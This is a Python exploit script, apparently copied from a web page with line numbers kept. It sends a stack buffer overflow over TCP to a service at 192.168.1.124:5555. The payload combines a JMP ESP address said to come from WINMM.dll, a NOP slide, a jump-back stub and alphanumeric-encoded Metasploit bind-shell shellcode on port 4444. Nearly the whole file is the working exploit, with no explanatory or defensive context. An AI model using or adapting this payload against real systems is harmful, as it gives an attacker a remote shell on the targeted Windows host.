#!/usr/bin/pythonimport socket#76B43ADC FFE4 JMP ESP - WINMM.dlljmp_esp

1. #!/usr/bin/python
2. import socket
3.  
4. #76B43ADC FFE4 JMP ESP - WINMM.dll
5. jmp_esp = "\xDC\x3A\xB4\x76"
6.  
7. # Stack Jump takes us back approx. 1000 bytes into our A's
8. stack_jmp = ("\x89\xe6\xd9\xe9\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49"
9. "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
10. "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
11. "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
12. "\x42\x75\x4a\x49\x68\x59\x5a\x4e\x7a\x79\x50\x74\x65\x74"
13. "\x6b\x44\x70\x59\x6b\x30\x6a\x61\x75\x5a\x6c\x50\x79\x6e"
14. "\x68\x4d\x4b\x4e\x68\x4d\x59\x6e\x78\x4d\x59\x6e\x4a\x6d"
15. "\x6b\x4e\x7a\x6d\x4b\x4f\x48\x61\x41\x41")
16.  
17. # msfpayload windows/shell_bind_tcp LPORT=4444 R |msfencode -e x86/alpha_mixed -b "\x40" -t c
18. # [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
19. # unsigned char buf[] =
20.  
21. shell_code=("\x89\xe2\xdb\xcc\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
22. "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
23. "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
24. "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
25. "\x79\x6c\x79\x78\x4d\x59\x53\x30\x65\x50\x57\x70\x65\x30\x6f"
26. "\x79\x6a\x45\x45\x61\x68\x52\x73\x54\x4e\x6b\x61\x42\x74\x70"
27. "\x4c\x4b\x33\x62\x54\x4c\x4c\x4b\x51\x42\x44\x54\x4e\x6b\x42"
28. "\x52\x45\x78\x54\x4f\x6c\x77\x62\x6a\x31\x36\x56\x51\x39\x6f"
29. "\x50\x31\x79\x50\x6c\x6c\x47\x4c\x55\x31\x43\x4c\x36\x62\x54"
30. "\x6c\x47\x50\x7a\x61\x5a\x6f\x46\x6d\x65\x51\x68\x47\x39\x72"
31. "\x7a\x50\x52\x72\x32\x77\x4c\x4b\x76\x32\x32\x30\x6c\x4b\x77"
32. "\x32\x35\x6c\x66\x61\x4a\x70\x6e\x6b\x37\x30\x70\x78\x4c\x45"
33. "\x59\x50\x33\x44\x31\x5a\x63\x31\x68\x50\x32\x70\x6c\x4b\x51"
34. "\x58\x46\x78\x4c\x4b\x71\x48\x75\x70\x55\x51\x6b\x63\x68\x63"
35. "\x45\x6c\x31\x59\x4e\x6b\x55\x64\x6c\x4b\x56\x61\x38\x56\x30"
36. "\x31\x6b\x4f\x55\x61\x49\x50\x4e\x4c\x7a\x61\x78\x4f\x54\x4d"
37. "\x35\x51\x78\x47\x36\x58\x49\x70\x44\x35\x38\x74\x55\x53\x33"
38. "\x4d\x39\x68\x55\x6b\x53\x4d\x34\x64\x70\x75\x69\x72\x63\x68"
39. "\x4c\x4b\x31\x48\x34\x64\x56\x61\x7a\x73\x31\x76\x4c\x4b\x36"
40. "\x6c\x70\x4b\x4c\x4b\x61\x48\x65\x4c\x33\x31\x59\x43\x6e\x6b"
41. "\x45\x54\x6e\x6b\x76\x61\x4a\x70\x6c\x49\x77\x34\x36\x44\x65"
42. "\x74\x73\x6b\x63\x6b\x55\x31\x53\x69\x62\x7a\x30\x51\x49\x6f"
43. "\x69\x70\x62\x78\x51\x4f\x30\x5a\x6c\x4b\x34\x52\x78\x6b\x6b"
44. "\x36\x61\x4d\x43\x58\x45\x63\x65\x62\x77\x70\x45\x50\x43\x58"
45. "\x72\x57\x33\x43\x37\x42\x63\x6f\x53\x64\x63\x58\x62\x6c\x31"
46. "\x67\x67\x56\x44\x47\x79\x6f\x4b\x65\x6d\x68\x4c\x50\x63\x31"
47. "\x47\x70\x55\x50\x34\x69\x7a\x64\x53\x64\x70\x50\x72\x48\x35"
48. "\x79\x4f\x70\x42\x4b\x65\x50\x79\x6f\x68\x55\x62\x70\x30\x50"
49. "\x32\x70\x76\x30\x51\x50\x46\x30\x73\x70\x46\x30\x50\x68\x59"
50. "\x7a\x74\x4f\x4b\x6f\x6d\x30\x79\x6f\x7a\x75\x4d\x59\x4b\x77"
51. "\x46\x51\x79\x4b\x66\x33\x33\x58\x34\x42\x47\x70\x77\x61\x61"
52. "\x4c\x4e\x69\x39\x76\x53\x5a\x32\x30\x62\x76\x63\x67\x45\x38"
53. "\x5a\x62\x59\x4b\x37\x47\x61\x77\x69\x6f\x6e\x35\x70\x53\x50"
54. "\x57\x62\x48\x6d\x67\x69\x79\x66\x58\x79\x6f\x4b\x4f\x79\x45"
55. "\x70\x53\x32\x73\x62\x77\x35\x38\x32\x54\x68\x6c\x75\x6b\x59"
56. "\x71\x49\x6f\x7a\x75\x53\x67\x6d\x59\x38\x47\x45\x38\x53\x45"
57. "\x70\x6e\x30\x4d\x43\x51\x6b\x4f\x48\x55\x30\x68\x72\x43\x72"
58. "\x4d\x50\x64\x53\x30\x4e\x69\x48\x63\x73\x67\x76\x37\x52\x77"
59. "\x74\x71\x5a\x56\x32\x4a\x77\x62\x73\x69\x71\x46\x38\x62\x4b"
60. "\x4d\x35\x36\x7a\x67\x63\x74\x37\x54\x57\x4c\x65\x51\x45\x51"
61. "\x4c\x4d\x53\x74\x66\x44\x44\x50\x6f\x36\x77\x70\x50\x44\x33"
62. "\x64\x52\x70\x62\x76\x52\x76\x31\x46\x71\x56\x73\x66\x32\x6e"
63. "\x66\x36\x63\x66\x43\x63\x71\x46\x70\x68\x70\x79\x38\x4c\x47"
64. "\x4f\x4f\x76\x59\x6f\x5a\x75\x4d\x59\x79\x70\x32\x6e\x61\x46"
65. "\x72\x66\x59\x6f\x70\x30\x42\x48\x34\x48\x6b\x37\x45\x4d\x75"
66. "\x30\x69\x6f\x59\x45\x4d\x6b\x38\x70\x48\x35\x4d\x72\x52\x76"
67. "\x63\x58\x6d\x76\x5a\x35\x6d\x6d\x4f\x6d\x6b\x4f\x39\x45\x45"
68. "\x6c\x44\x46\x31\x6c\x54\x4a\x6f\x70\x39\x6b\x6b\x50\x53\x45"
69. "\x44\x45\x4f\x4b\x31\x57\x66\x73\x64\x32\x50\x6f\x63\x5a\x37"
70. "\x70\x76\x33\x4b\x4f\x4b\x65\x41\x41")
71.  
72. # Align our stack ;add esp, -1500
73. stack_align =  "\x81\xc4\x24\xfa\xff\xff"
74.  
75. # Nop Slide
76. nops = "\x90" * 100
77.  
78. buffer = "A" * (2042 - len(shell_code))
79. buffer += stack_align
80. buffer += shell_code
81. buffer += jmp_esp
82. buffer += nops
83. buffer += stack_jmp
84. buffer += "\x43" * (2500 - len(buffer))
85. command = "@F000"
86. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
87. connect = s.connect(("192.168.1.124",5555))
88. s.send(command+buffer+"@\r\n_dark_knight_\r\n\r\n")
89. s.close()